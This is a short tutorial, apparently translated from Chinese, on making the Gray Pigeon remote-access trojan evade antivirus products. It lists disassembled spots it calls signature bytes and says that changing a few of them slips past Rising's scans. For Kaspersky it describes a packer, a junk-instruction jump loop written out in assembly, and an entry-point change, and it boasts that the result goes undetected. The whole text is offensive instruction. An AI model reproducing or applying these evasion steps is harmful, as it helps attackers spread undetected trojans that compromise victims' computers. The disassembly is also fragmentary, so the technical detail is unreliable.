Today I'm doing AV evasion for the official Gray Pigeon (鸽子). The first step is finding the pigeon's signature bytes; to save everyone time, I've already located them.
0049AEC0 /EB 08 jmp short 00470000.0049AECA
0049AEC2 |8B45 FC mov eax,dword ptr ss:[ebp-4]
0049AEC5 |8B08 mov ecx,dword ptr ds:[eax]
0049AEC7 |FF51 F0 call dword ptr ds:[ecx-10]
0049AECA \5F pop edi
0049AECB 5E pop esi
0049AECC 5B pop ebx
0049AECD 59 pop ecx
0049AECE 5D pop ebp
0049AECF C3 retn
0049AED0 42 inc edx
0049AED1 45 inc ebp
0049AED2 49 dec ecx
0049AED3 5F pop edi
0049AED4 5A pop edx
0049AED5 48 dec eax
0049AED6 55 push ebp
0049AED7 0053 4F add byte ptr ds:[ebx+4F],dl
0049AEDA 46 inc esi
0049AEDB 54 push esp
0049AEDC 57 push edi
0049AEDD 41 inc ecx
0049AEDE 52 push edx
0049AEDF 45 inc ebp

004701F0 6361 74 arpl word ptr ds:[ecx+74],sp
004701F3 696F 6E 127361> imul ebp,dword ptr ds:[edi+6E],55617312
004701FA 73 65 jnb short 00450003.00470261
004701FC 72 6E jb short 00450003.0047026C
004701FE 61 popad
004701FF 6D ins dword ptr es:[edi],dx

00458D82 6F outs dx,dword ptr es:[edi]
00458D83 6365 73 arpl word ptr ss:[ebp+73],sp
00458D86 73 33 jnb short 复件_Ser.00458DBB
00458D88 324E 65 xor cl,byte ptr ds:[esi+65]
00458D8B 78 74 js short 复件_Ser.00458E01
00458D8D 0000 add byte ptr ds:[eax],al
00458D8F 0050 72 add byte ptr ds:[eax+72],dl

00458D00 43 inc ebx
00458D01 72 65 jb short 复件_Ser.00458D68
00458D03 61 popad
00458D04 74 65 je short 复件_Ser.00458D6B
00458D06 54 push esp
00458D07 6F outs dx,dword ptr es:[edi]
00458D08 6F outs dx,dword ptr es:[edi]
00458D09 6C ins byte ptr es:[edi],dx
00458D0A 68 656C7033 push 33706C65
00458D0F 3253 6E xor dl,byte ptr ds:[ebx+6E]
Changing a few spots is enough. See, it gets past Rising's memory scan too! What was being detected just now was the pigeon's control end. It passes now.
Next, to get past Kaspersky: add a packer with 木马彩衣, then use junk instructions (花指令) to jump:
push ebp
mov ebp,esp
mov ecx,33
push 0
push 0
dec ecx
jnz 入口点
004C60C5 1> 55 push ebp
004C60FF 0000 add byte ptr ds:[eax],al
Then change the entry point and it's done.
Let's test it. Hold on, it's a bit slow, it froze; it definitely won't be detected. Let's wait and see. ^-^ OK, everything went smoothly.